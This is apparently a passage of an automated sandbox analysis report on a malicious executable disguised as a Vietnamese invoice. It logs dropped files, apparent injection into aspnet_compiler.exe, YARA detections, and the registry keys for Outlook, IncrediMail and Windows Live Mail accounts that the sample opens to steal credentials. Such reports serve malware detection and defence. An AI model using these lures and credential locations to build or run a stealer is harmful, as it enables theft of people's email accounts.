              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\dwn.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\dwn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeQueries volume information: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeQueries volume information: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_10002933 cpuid 12_2_10002933
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_10002264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,12_2_10002264
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 14_2_0041739B GetVersionExW,14_2_0041739B

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36b0640.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36d8660.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000000.351505282.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.520253260.0000000001307000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.357319262.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.357530014.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.355401113.00000000025D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe PID: 3988, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 3660, type: MEMORYSTR
              Source: Yara matchFile source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
